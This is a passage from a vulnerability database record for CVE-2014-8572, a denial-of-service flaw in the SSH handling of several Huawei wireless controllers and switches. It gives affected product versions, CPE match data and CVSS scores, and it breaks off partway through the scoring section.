      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "information disclosure",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
      trust: 0.6,
   },
}

var-201704-0463
Vulnerability from variot

Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service. plural Huawei Product software includes VRP Special to device SSH Packets are sent and service operation is interrupted (DoS) There are vulnerabilities that are put into a state.By a remote attacker, VRP Special to device SSH Packets are sent and service operation is interrupted (DoS) There is a possibility of being put into a state. HuaweiAC6605 is a wireless access controller product from China's Huawei company. A security vulnerability exists in the SSH module of several Huawei products. The vulnerability is caused by the lack of valid verification of a domain in the message content when the program processes the message. This vulnerability could be exploited by an attacker to cause a device service interruption using the VRP platform. The following products and versions are affected: Huawei AC6605 V200R001C00 Version, AC6605 V200R002C00 Version, ACU V200R001C00 Version, V200R002C00 Version, S2300/ S3300/S2700/ S3700 V100R006C05 and previous versions, S5300/ S5700/S6300/ S6700 V100R006 Version, V200R001 Version, V200R002 Version, V200R003, V200R005C00SPC300 and earlier versions, S7700/S9300/S9300E/S9700 V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0463",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s9700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s5700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s9300e",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s7700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s5300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "ac6605",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "ac6605_v200r001c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s9300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s6300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s6700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "acu",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "acu_v200r002c00",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "acu",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "acu_v200r001c00",
         },
         {
            model: "s series",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "ac6605",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "ac6605_v200r002c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "ac6605",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "acu",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ac6605 v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ac6605 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "acu v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "acu v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 <=v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300 <=v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 <=v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3700 <=v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 <=v200r005c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ac6605_firmware:ac6605_v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ac6605_firmware:ac6605_v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ac6605:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:acu_firmware:acu_v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:acu_firmware:acu_v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:acu:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s_series_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s3300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s3700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v100r006:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r005c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
      trust: 0.6,
   },
   cve: "CVE-2014-8572",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
